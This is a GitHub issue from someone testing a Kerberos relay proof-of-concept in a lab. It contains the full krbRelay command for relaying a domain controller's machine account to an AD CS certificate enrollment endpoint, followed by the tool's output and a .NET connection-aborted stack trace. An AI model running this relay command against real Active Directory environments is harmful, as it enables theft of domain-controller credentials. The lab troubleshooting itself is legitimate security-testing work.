-
Notifications
You must be signed in to change notification settings - Fork 28
Open
Description
Thanks for creating the POC. Just trying it out in my lab and I am running into the following problem. Maybe you run into the same problem? Otherwise I let you know when I find the mistake or the solution.
The CSR is correct.
C:\tmp\KrbRelay>krbRelay.exe -spn http/ca.domain.ch -redirecthost ca1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA -endpoint certsrv -adcs sancert -listenerport 445 -relayeduser dc01$ -redirectserver 192.168.12.202
[*] Socket Server Start: 445
[*] Client connected: [::ffff:192.168.12.101]:51355
[*] sending smbNegotiateProtocolResponse
[*] sending smb2NegotiateProtocolResponse
[*] Got AP-REQ for : http
[+] HTTP session established
[*] Subject: CN=\\dc01$
[*] CSR Request:
-----BEGIN+CERTIFICATE+REQUEST-----MIIEWDCCAk...-----END+CERTIFICATE+REQUEST-----
[*] Requesting certificate
[*] Testing: sancert
[-] System.AggregateException: One or more errors occurred. ---> System.Net.Http.HttpRequestException: Error while copying content to a stream. ---> System.IO.IOException: Unable to read data from the transport connection: An established connection was aborted by the software in your host machine. ---> System.Net.Sockets.SocketException: An established connection was aborted by the software in your host machine
at System.Net.Sockets.Socket.BeginReceive(Byte[] buffer, Int32 offset, Int32 size, SocketFlags socketFlags, AsyncCallback callback, Object state)
at System.Net.Sockets.NetworkStream.BeginRead(Byte[] buffer, Int32 offset, Int32 size, AsyncCallback callback, Object state)
--- End of inner exception stack trace ---
at System.Net.Sockets.NetworkStream.BeginRead(Byte[] buffer, Int32 offset, Int32 size, AsyncCallback callback, Object state)
at System.Net.ConnectStream.BeginReadWithoutValidation(Byte[] buffer, Int32 offset, Int32 size, AsyncCallback callback, Object state)
at System.Net.ConnectStream.BeginRead(Byte[] buffer, Int32 offset, Int32 size, AsyncCallback callback, Object state)
at System.Net.Http.HttpClientHandler.WebExceptionWrapperStream.BeginRead(Byte[] buffer, Int32 offset, Int32 count, AsyncCallback callback, Object state)
at System.Net.Http.StreamToStreamCopy.StartRead()
--- End of inner exception stack trace ---
--- End of inner exception stack trace ---
at System.Threading.Tasks.Task`1.GetResultCore(Boolean waitCompletionNotification)
at KrbRelay.Clients.Attacks.Http.ADCS.requestCertificate(HttpClient httpClient, String user, String domain, String template)
at KrbRelay.Clients.Http.Connect()
---> (Inner Exception #0) System.Net.Http.HttpRequestException: Error while copying content to a stream. ---> System.IO.IOException: Unable to read data from the transport connection: An established connection was aborted by the software in your host machine. ---> System.Net.Sockets.SocketException: An established connection was aborted by the software in your host machine
at System.Net.Sockets.Socket.BeginReceive(Byte[] buffer, Int32 offset, Int32 size, SocketFlags socketFlags, AsyncCallback callback, Object state)
at System.Net.Sockets.NetworkStream.BeginRead(Byte[] buffer, Int32 offset, Int32 size, AsyncCallback callback, Object state)
--- End of inner exception stack trace ---
at System.Net.Sockets.NetworkStream.BeginRead(Byte[] buffer, Int32 offset, Int32 size, AsyncCallback callback, Object state)
at System.Net.ConnectStream.BeginReadWithoutValidation(Byte[] buffer, Int32 offset, Int32 size, AsyncCallback callback, Object state)
at System.Net.ConnectStream.BeginRead(Byte[] buffer, Int32 offset, Int32 size, AsyncCallback callback, Object state)
at System.Net.Http.HttpClientHandler.WebExceptionWrapperStream.BeginRead(Byte[] buffer, Int32 offset, Int32 count, AsyncCallback callback, Object state)
at System.Net.Http.StreamToStreamCopy.StartRead()
--- End of inner exception stack trace ---<---
Its not timing issue I tried: httpClient = new HttpClient(handler) { Timeout = TimeSpan.FromMinutes(2) };
Thank you
Reactions are currently unavailable
Metadata
Metadata
Assignees
Labels
No labels